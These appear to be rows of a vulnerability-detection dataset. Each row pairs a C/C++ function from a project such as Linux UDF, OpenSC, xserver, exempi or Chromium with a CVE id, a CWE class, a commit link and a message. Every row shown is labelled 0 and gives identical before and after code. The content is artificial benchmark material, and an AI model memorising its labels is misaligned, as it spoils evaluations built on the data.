if ((++offset << dir->i_sb->s_blocksize_bits) < elen) {
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
} else
offset = 0;
fibh->sbh = fibh->ebh = udf_tread(dir->i_sb, block);
if (!fibh->sbh) {
*err = -EIO;
goto out_err;
}
block = dinfo->i_location.logicalBlockNum;
}
while (f_pos < size) {
fi = udf_fileident_read(dir, &f_pos, fibh, cfi, &epos, &eloc,
&elen, &offset);
if (!fi) {
*err = -EIO;
goto out_err;
}
liu = le16_to_cpu(cfi->lengthOfImpUse);
lfi = cfi->lengthFileIdent;
if ((cfi->fileCharacteristics & FID_FILE_CHAR_DELETED) != 0) {
if (((sizeof(struct fileIdentDesc) +
liu + lfi + 3) & ~3) == nfidlen) {
cfi->descTag.tagSerialNum = cpu_to_le16(1);
cfi->fileVersionNum = cpu_to_le16(1);
cfi->fileCharacteristics = 0;
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL,
name))
goto out_ok;
else {
*err = -EIO;
goto out_err;
}
}
}
}
add:
f_pos += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
sb->s_blocksize - fibh->eoffset < nfidlen) {
brelse(epos.bh);
epos.bh = NULL;
fibh->soffset -= udf_ext0_offset(dir);
fibh->eoffset -= udf_ext0_offset(dir);
f_pos -= udf_ext0_offset(dir);
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh =
udf_expand_dir_adinicb(dir, &block, err);
if (!fibh->sbh)
goto out_err;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
/* Load extent udf_expand_dir_adinicb() has created */
udf_current_aext(dir, &epos, &eloc, &elen, 1);
}
/* Entry fits into current block? */
if (sb->s_blocksize - fibh->eoffset >= nfidlen) {
fibh->soffset = fibh->eoffset;
fibh->eoffset += nfidlen;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
block = dinfo->i_location.logicalBlockNum;
fi = (struct fileIdentDesc *)
(dinfo->i_ext.i_data +
fibh->soffset -
udf_ext0_offset(dir) +
dinfo->i_lenEAttr);
} else {
block = eloc.logicalBlockNum +
((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + fibh->soffset);
}
} else {
/* Round up last extent in the file */
elen = (elen + sb->s_blocksize - 1) & ~(sb->s_blocksize - 1);
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = (dinfo->i_lenExtents + sb->s_blocksize
- 1) & ~(sb->s_blocksize - 1);
fibh->soffset = fibh->eoffset - sb->s_blocksize;
fibh->eoffset += nfidlen - sb->s_blocksize;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fibh->ebh = udf_bread(dir,
f_pos >> dir->i_sb->s_blocksize_bits, 1, err);
if (!fibh->ebh)
goto out_err;
/* Extents could have been merged, invalidate our position */
brelse(epos.bh);
epos.bh = NULL;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
if (!fibh->soffset) {
/* Find the freshly allocated block */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
fi = (struct fileIdentDesc *)(fibh->sbh->b_data);
} else {
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + sb->s_blocksize +
fibh->soffset);
}
}
memset(cfi, 0, sizeof(struct fileIdentDesc));
if (UDF_SB(sb)->s_udfrev >= 0x0200)
udf_new_tag((char *)cfi, TAG_IDENT_FID, 3, 1, block,
sizeof(struct tag));
else
udf_new_tag((char *)cfi, TAG_IDENT_FID, 2, 1, block,
sizeof(struct tag));
cfi->fileVersionNum = cpu_to_le16(1);
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL, name)) {
dir->i_size += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
dinfo->i_lenAlloc += nfidlen;
else {
/* Find the last extent and truncate it to proper size */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
elen -= dinfo->i_lenExtents - dir->i_size;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = dir->i_size;
}
mark_inode_dirty(dir);
goto out_ok;
} else {
*err = -EIO;
goto out_err;
}
out_err:
fi = NULL;
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
out_ok:
brelse(epos.bh);
kfree(name);
return fi;
}
| static struct fileIdentDesc *udf_add_entry(struct inode *dir,
struct dentry *dentry,
struct udf_fileident_bh *fibh,
struct fileIdentDesc *cfi, int *err)
{
struct super_block *sb = dir->i_sb;
struct fileIdentDesc *fi = NULL;
unsigned char *name = NULL;
int namelen;
loff_t f_pos;
loff_t size = udf_ext0_offset(dir) + dir->i_size;
int nfidlen;
uint8_t lfi;
uint16_t liu;
int block;
struct kernel_lb_addr eloc;
uint32_t elen = 0;
sector_t offset;
struct extent_position epos = {};
struct udf_inode_info *dinfo;
fibh->sbh = fibh->ebh = NULL;
name = kmalloc(UDF_NAME_LEN, GFP_NOFS);
if (!name) {
*err = -ENOMEM;
goto out_err;
}
if (dentry) {
if (!dentry->d_name.len) {
*err = -EINVAL;
goto out_err;
}
namelen = udf_put_filename(sb, dentry->d_name.name, name,
dentry->d_name.len);
if (!namelen) {
*err = -ENAMETOOLONG;
goto out_err;
}
} else {
namelen = 0;
}
nfidlen = (sizeof(struct fileIdentDesc) + namelen + 3) & ~3;
f_pos = udf_ext0_offset(dir);
fibh->soffset = fibh->eoffset = f_pos & (dir->i_sb->s_blocksize - 1);
dinfo = UDF_I(dir);
if (dinfo->i_alloc_type != ICBTAG_FLAG_AD_IN_ICB) {
if (inode_bmap(dir, f_pos >> dir->i_sb->s_blocksize_bits, &epos,
&eloc, &elen, &offset) != (EXT_RECORDED_ALLOCATED >> 30)) {
block = udf_get_lb_pblock(dir->i_sb,
&dinfo->i_location, 0);
fibh->soffset = fibh->eoffset = sb->s_blocksize;
goto add;
}
block = udf_get_lb_pblock(dir->i_sb, &eloc, offset);
if ((++offset << dir->i_sb->s_blocksize_bits) < elen) {
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
} else
offset = 0;
fibh->sbh = fibh->ebh = udf_tread(dir->i_sb, block);
if (!fibh->sbh) {
*err = -EIO;
goto out_err;
}
block = dinfo->i_location.logicalBlockNum;
}
while (f_pos < size) {
fi = udf_fileident_read(dir, &f_pos, fibh, cfi, &epos, &eloc,
&elen, &offset);
if (!fi) {
*err = -EIO;
goto out_err;
}
liu = le16_to_cpu(cfi->lengthOfImpUse);
lfi = cfi->lengthFileIdent;
if ((cfi->fileCharacteristics & FID_FILE_CHAR_DELETED) != 0) {
if (((sizeof(struct fileIdentDesc) +
liu + lfi + 3) & ~3) == nfidlen) {
cfi->descTag.tagSerialNum = cpu_to_le16(1);
cfi->fileVersionNum = cpu_to_le16(1);
cfi->fileCharacteristics = 0;
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL,
name))
goto out_ok;
else {
*err = -EIO;
goto out_err;
}
}
}
}
add:
f_pos += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
sb->s_blocksize - fibh->eoffset < nfidlen) {
brelse(epos.bh);
epos.bh = NULL;
fibh->soffset -= udf_ext0_offset(dir);
fibh->eoffset -= udf_ext0_offset(dir);
f_pos -= udf_ext0_offset(dir);
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh =
udf_expand_dir_adinicb(dir, &block, err);
if (!fibh->sbh)
goto out_err;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
/* Load extent udf_expand_dir_adinicb() has created */
udf_current_aext(dir, &epos, &eloc, &elen, 1);
}
/* Entry fits into current block? */
if (sb->s_blocksize - fibh->eoffset >= nfidlen) {
fibh->soffset = fibh->eoffset;
fibh->eoffset += nfidlen;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
block = dinfo->i_location.logicalBlockNum;
fi = (struct fileIdentDesc *)
(dinfo->i_ext.i_data +
fibh->soffset -
udf_ext0_offset(dir) +
dinfo->i_lenEAttr);
} else {
block = eloc.logicalBlockNum +
((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + fibh->soffset);
}
} else {
/* Round up last extent in the file */
elen = (elen + sb->s_blocksize - 1) & ~(sb->s_blocksize - 1);
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = (dinfo->i_lenExtents + sb->s_blocksize
- 1) & ~(sb->s_blocksize - 1);
fibh->soffset = fibh->eoffset - sb->s_blocksize;
fibh->eoffset += nfidlen - sb->s_blocksize;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fibh->ebh = udf_bread(dir,
f_pos >> dir->i_sb->s_blocksize_bits, 1, err);
if (!fibh->ebh)
goto out_err;
/* Extents could have been merged, invalidate our position */
brelse(epos.bh);
epos.bh = NULL;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
if (!fibh->soffset) {
/* Find the freshly allocated block */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
fi = (struct fileIdentDesc *)(fibh->sbh->b_data);
} else {
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + sb->s_blocksize +
fibh->soffset);
}
}
memset(cfi, 0, sizeof(struct fileIdentDesc));
if (UDF_SB(sb)->s_udfrev >= 0x0200)
udf_new_tag((char *)cfi, TAG_IDENT_FID, 3, 1, block,
sizeof(struct tag));
else
udf_new_tag((char *)cfi, TAG_IDENT_FID, 2, 1, block,
sizeof(struct tag));
cfi->fileVersionNum = cpu_to_le16(1);
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL, name)) {
dir->i_size += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
dinfo->i_lenAlloc += nfidlen;
else {
/* Find the last extent and truncate it to proper size */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
elen -= dinfo->i_lenExtents - dir->i_size;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = dir->i_size;
}
mark_inode_dirty(dir);
goto out_ok;
} else {
*err = -EIO;
goto out_err;
}
out_err:
fi = NULL;
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
out_ok:
brelse(epos.bh);
kfree(name);
return fi;
}
| C | linux | 0 |
CVE-2018-16425 | https://www.cvedetails.com/cve/CVE-2018-16425/ | CWE-415 | https://github.com/OpenSC/OpenSC/commit/360e95d45ac4123255a4c796db96337f332160ad#diff-d643a0fa169471dbf2912f4866dc49c5 | 360e95d45ac4123255a4c796db96337f332160ad#diff-d643a0fa169471dbf2912f4866dc49c5 | fixed out of bounds writes
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting the problems. | static int muscle_delete_mscfs_file(sc_card_t *card, mscfs_file_t *file_data)
{
mscfs_t *fs = MUSCLE_FS(card);
msc_id id = file_data->objectId;
u8* oid = id.id;
int r;
if(!file_data->ef) {
int x;
mscfs_file_t *childFile;
/* Delete children */
mscfs_check_cache(fs);
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING Children of: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
for(x = 0; x < fs->cache.size; x++) {
msc_id objectId;
childFile = &fs->cache.array[x];
objectId = childFile->objectId;
if(0 == memcmp(oid + 2, objectId.id, 2)) {
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING: %02X%02X%02X%02X\n",
objectId.id[0],objectId.id[1],
objectId.id[2],objectId.id[3]);
r = muscle_delete_mscfs_file(card, childFile);
if(r < 0) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
}
oid[0] = oid[2];
oid[1] = oid[3];
oid[2] = oid[3] = 0;
/* ??? objectId = objectId >> 16; */
}
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4))) {
}
r = msc_delete_object(card, id, 1);
/* Check if its the root... this file generally is virtual
* So don't return an error if it fails */
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4)))
return 0;
if(r < 0) {
printf("ID: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
return 0;
}
| static int muscle_delete_mscfs_file(sc_card_t *card, mscfs_file_t *file_data)
{
mscfs_t *fs = MUSCLE_FS(card);
msc_id id = file_data->objectId;
u8* oid = id.id;
int r;
if(!file_data->ef) {
int x;
mscfs_file_t *childFile;
/* Delete children */
mscfs_check_cache(fs);
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING Children of: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
for(x = 0; x < fs->cache.size; x++) {
msc_id objectId;
childFile = &fs->cache.array[x];
objectId = childFile->objectId;
if(0 == memcmp(oid + 2, objectId.id, 2)) {
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING: %02X%02X%02X%02X\n",
objectId.id[0],objectId.id[1],
objectId.id[2],objectId.id[3]);
r = muscle_delete_mscfs_file(card, childFile);
if(r < 0) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
}
oid[0] = oid[2];
oid[1] = oid[3];
oid[2] = oid[3] = 0;
/* ??? objectId = objectId >> 16; */
}
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4))) {
}
r = msc_delete_object(card, id, 1);
/* Check if its the root... this file generally is virtual
* So don't return an error if it fails */
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4)))
return 0;
if(r < 0) {
printf("ID: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
return 0;
}
| C | OpenSC | 0 |
CVE-2017-10971 | https://www.cvedetails.com/cve/CVE-2017-10971/ | CWE-119 | https://cgit.freedesktop.org/xorg/xserver/commit/?id=215f894965df5fb0bb45b107d84524e700d2073c | 215f894965df5fb0bb45b107d84524e700d2073c | null | void FreeSprite(DeviceIntPtr dev)
{
if (DevHasCursor(dev) && dev->spriteInfo->sprite) {
if (dev->spriteInfo->sprite->current)
FreeCursor(dev->spriteInfo->sprite->current, None);
free(dev->spriteInfo->sprite->spriteTrace);
free(dev->spriteInfo->sprite);
}
dev->spriteInfo->sprite = NULL;
}
| void FreeSprite(DeviceIntPtr dev)
{
if (DevHasCursor(dev) && dev->spriteInfo->sprite) {
if (dev->spriteInfo->sprite->current)
FreeCursor(dev->spriteInfo->sprite->current, None);
free(dev->spriteInfo->sprite->spriteTrace);
free(dev->spriteInfo->sprite);
}
dev->spriteInfo->sprite = NULL;
}
| C | xserver | 0 |
CVE-2018-7728 | https://www.cvedetails.com/cve/CVE-2018-7728/ | CWE-125 | https://cgit.freedesktop.org/exempi/commit/?id=e163667a06a9b656a047b0ec660b871f29a83c9f | e163667a06a9b656a047b0ec660b871f29a83c9f | null | void TIFF_MetaHandler::UpdateFile ( bool doSafeUpdate )
{
XMP_Assert ( ! doSafeUpdate ); // This should only be called for "unsafe" updates.
XMP_IO* destRef = this->parent->ioRef;
XMP_AbortProc abortProc = this->parent->abortProc;
void * abortArg = this->parent->abortArg;
XMP_Int64 oldPacketOffset = this->packetInfo.offset;
XMP_Int32 oldPacketLength = this->packetInfo.length;
if ( oldPacketOffset == kXMPFiles_UnknownOffset ) oldPacketOffset = 0; // ! Simplify checks.
if ( oldPacketLength == kXMPFiles_UnknownLength ) oldPacketLength = 0;
bool fileHadXMP = ((oldPacketOffset != 0) && (oldPacketLength != 0));
ExportPhotoData ( kXMP_TIFFFile, &this->xmpObj, &this->tiffMgr, this->iptcMgr, this->psirMgr );
try {
XMP_OptionBits options = kXMP_UseCompactFormat;
if ( fileHadXMP ) options |= kXMP_ExactPacketLength;
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, options, oldPacketLength );
} catch ( ... ) {
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, kXMP_UseCompactFormat );
}
bool doInPlace = (fileHadXMP && (this->xmpPacket.size() <= (size_t)oldPacketLength));
if ( this->tiffMgr.IsLegacyChanged() ) doInPlace = false;
bool localProgressTracking = false;
XMP_ProgressTracker* progressTracker = this->parent->progressTracker;
if ( ! doInPlace ) {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF append update";
#endif
if ( (progressTracker != 0) && (! progressTracker->WorkInProgress()) ) {
localProgressTracking = true;
progressTracker->BeginWork();
}
this->tiffMgr.SetTag ( kTIFF_PrimaryIFD, kTIFF_XMP, kTIFF_UndefinedType, (XMP_Uns32)this->xmpPacket.size(), this->xmpPacket.c_str() );
this->tiffMgr.UpdateFileStream ( destRef, progressTracker );
} else {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF in-place update";
#endif
if ( this->xmpPacket.size() < (size_t)this->packetInfo.length ) {
size_t extraSpace = (size_t)this->packetInfo.length - this->xmpPacket.size();
this->xmpPacket.append ( extraSpace, ' ' );
}
XMP_IO* liveFile = this->parent->ioRef;
XMP_Assert ( this->xmpPacket.size() == (size_t)oldPacketLength ); // ! Done by common PutXMP logic.
if ( progressTracker != 0 ) {
if ( progressTracker->WorkInProgress() ) {
progressTracker->AddTotalWork ( this->xmpPacket.size() );
} else {
localProgressTracking = true;
progressTracker->BeginWork ( this->xmpPacket.size() );
}
}
liveFile->Seek ( oldPacketOffset, kXMP_SeekFromStart );
liveFile->Write ( this->xmpPacket.c_str(), (XMP_Int32)this->xmpPacket.size() );
}
if ( localProgressTracking ) progressTracker->WorkComplete();
this->needsUpdate = false;
} // TIFF_MetaHandler::UpdateFile
| void TIFF_MetaHandler::UpdateFile ( bool doSafeUpdate )
{
XMP_Assert ( ! doSafeUpdate ); // This should only be called for "unsafe" updates.
XMP_IO* destRef = this->parent->ioRef;
XMP_AbortProc abortProc = this->parent->abortProc;
void * abortArg = this->parent->abortArg;
XMP_Int64 oldPacketOffset = this->packetInfo.offset;
XMP_Int32 oldPacketLength = this->packetInfo.length;
if ( oldPacketOffset == kXMPFiles_UnknownOffset ) oldPacketOffset = 0; // ! Simplify checks.
if ( oldPacketLength == kXMPFiles_UnknownLength ) oldPacketLength = 0;
bool fileHadXMP = ((oldPacketOffset != 0) && (oldPacketLength != 0));
ExportPhotoData ( kXMP_TIFFFile, &this->xmpObj, &this->tiffMgr, this->iptcMgr, this->psirMgr );
try {
XMP_OptionBits options = kXMP_UseCompactFormat;
if ( fileHadXMP ) options |= kXMP_ExactPacketLength;
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, options, oldPacketLength );
} catch ( ... ) {
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, kXMP_UseCompactFormat );
}
bool doInPlace = (fileHadXMP && (this->xmpPacket.size() <= (size_t)oldPacketLength));
if ( this->tiffMgr.IsLegacyChanged() ) doInPlace = false;
bool localProgressTracking = false;
XMP_ProgressTracker* progressTracker = this->parent->progressTracker;
if ( ! doInPlace ) {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF append update";
#endif
if ( (progressTracker != 0) && (! progressTracker->WorkInProgress()) ) {
localProgressTracking = true;
progressTracker->BeginWork();
}
this->tiffMgr.SetTag ( kTIFF_PrimaryIFD, kTIFF_XMP, kTIFF_UndefinedType, (XMP_Uns32)this->xmpPacket.size(), this->xmpPacket.c_str() );
this->tiffMgr.UpdateFileStream ( destRef, progressTracker );
} else {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF in-place update";
#endif
if ( this->xmpPacket.size() < (size_t)this->packetInfo.length ) {
size_t extraSpace = (size_t)this->packetInfo.length - this->xmpPacket.size();
this->xmpPacket.append ( extraSpace, ' ' );
}
XMP_IO* liveFile = this->parent->ioRef;
XMP_Assert ( this->xmpPacket.size() == (size_t)oldPacketLength ); // ! Done by common PutXMP logic.
if ( progressTracker != 0 ) {
if ( progressTracker->WorkInProgress() ) {
progressTracker->AddTotalWork ( this->xmpPacket.size() );
} else {
localProgressTracking = true;
progressTracker->BeginWork ( this->xmpPacket.size() );
}
}
liveFile->Seek ( oldPacketOffset, kXMP_SeekFromStart );
liveFile->Write ( this->xmpPacket.c_str(), (XMP_Int32)this->xmpPacket.size() );
}
if ( localProgressTracking ) progressTracker->WorkComplete();
this->needsUpdate = false;
} // TIFF_MetaHandler::UpdateFile
| CPP | exempi | 0 |
null | null | null | https://github.com/chromium/chromium/commit/a0af50481db56aa780942e8595a20c36b2c34f5c | a0af50481db56aa780942e8595a20c36b2c34f5c | Build fix following bug #30696.
Patch by Gavin Barraclough <barraclough@apple.com> on 2009-10-22
Reviewed by NOBODY (build fix).
* WebCoreSupport/FrameLoaderClientGtk.cpp:
(WebKit::FrameLoaderClient::windowObjectCleared):
* webkit/webkitwebframe.cpp:
(webkit_web_frame_get_global_context):
git-svn-id: svn://svn.chromium.org/blink/trunk@49964 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void FrameLoaderClient::dispatchWillPerformClientRedirect(const KURL&, double, double)
{
notImplemented();
}
| void FrameLoaderClient::dispatchWillPerformClientRedirect(const KURL&, double, double)
{
notImplemented();
}
| C | Chrome | 0 |
CVE-2011-2830 | https://www.cvedetails.com/cve/CVE-2011-2830/ | CWE-399 | https://github.com/chromium/chromium/commit/08b630e66e042af3fe80015509b3238c2679ea40 | 08b630e66e042af3fe80015509b3238c2679ea40 | PopupMenuClient::multiple() should be const
https://bugs.webkit.org/show_bug.cgi?id=76771
Patch by Benjamin Poulain <bpoulain@apple.com> on 2012-01-21
Reviewed by Kent Tamura.
* platform/PopupMenuClient.h:
(WebCore::PopupMenuClient::multiple):
* rendering/RenderMenuList.cpp:
(WebCore::RenderMenuList::multiple):
* rendering/RenderMenuList.h:
git-svn-id: svn://svn.chromium.org/blink/trunk@105570 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void RenderMenuList::didSetSelectedIndex(int listIndex)
{
didUpdateActiveOption(toHTMLSelectElement(node())->listToOptionIndex(listIndex));
}
| void RenderMenuList::didSetSelectedIndex(int listIndex)
{
didUpdateActiveOption(toHTMLSelectElement(node())->listToOptionIndex(listIndex));
}
| C | Chrome | 0 |
CVE-2017-6001 | https://www.cvedetails.com/cve/CVE-2017-6001/ | CWE-362 | https://github.com/torvalds/linux/commit/321027c1fe77f892f4ea07846aeae08cefbbb290 | 321027c1fe77f892f4ea07846aeae08cefbbb290 | perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race
Di Shen reported a race between two concurrent sys_perf_event_open()
calls where both try and move the same pre-existing software group
into a hardware context.
The problem is exactly that described in commit:
f63a8daa5812 ("perf: Fix event->ctx locking")
... where, while we wait for a ctx->mutex acquisition, the event->ctx
relation can have changed under us.
That very same commit failed to recognise sys_perf_event_context() as an
external access vector to the events and thereby didn't apply the
established locking rules correctly.
So while one sys_perf_event_open() call is stuck waiting on
mutex_lock_double(), the other (which owns said locks) moves the group
about. So by the time the former sys_perf_event_open() acquires the
locks, the context we've acquired is stale (and possibly dead).
Apply the established locking rules as per perf_event_ctx_lock_nested()
to the mutex_lock_double() for the 'move_group' case. This obviously means
we need to validate state after we acquire the locks.
Reported-by: Di Shen (Keen Lab)
Tested-by: John Dias <joaodias@google.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Min Chong <mchong@google.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@google.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Vince Weaver <vincent.weaver@maine.edu>
Fixes: f63a8daa5812 ("perf: Fix event->ctx locking")
Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net
Signed-off-by: Ingo Molnar <mingo@kernel.org> | static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
/*
* We want to keep the following priority order:
* cpu pinned (that don't need to move), task pinned,
* cpu flexible, task flexible.
*/
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
perf_ctx_unlock(cpuctx, ctx);
}
| static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
/*
* We want to keep the following priority order:
* cpu pinned (that don't need to move), task pinned,
* cpu flexible, task flexible.
*/
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
perf_ctx_unlock(cpuctx, ctx);
}
| C | linux | 0 |
CVE-2016-5194 | null | null | https://github.com/chromium/chromium/commit/d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | Clear Shill stub config in offline file manager tests
The Shill stub client fakes ethernet and wifi connections during
testing. Clear its config during offline tests to simulate a lack of
network connectivity.
As a side effect, fileManagerPrivate.getDriveConnectionState will no
longer need to be stubbed out, as it will now think the device is
offline and return the appropriate result.
Bug: 925272
Change-Id: Idd6cb44325cfde4991d3b1e64185a28e8655c733
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1578149
Commit-Queue: Austin Tankiang <austinct@chromium.org>
Reviewed-by: Sam McNally <sammc@chromium.org>
Cr-Commit-Position: refs/heads/master@{#654782} | void CreateTeamDrive(const std::string& name,
google_apis::TeamDriveCapabilities capabilities) {
fake_drive_service_->AddTeamDrive(name, name);
fake_drive_service_->SetTeamDriveCapabilities(name, capabilities);
}
| void CreateTeamDrive(const std::string& name,
google_apis::TeamDriveCapabilities capabilities) {
fake_drive_service_->AddTeamDrive(name, name);
fake_drive_service_->SetTeamDriveCapabilities(name, capabilities);
}
| C | Chrome | 0 |
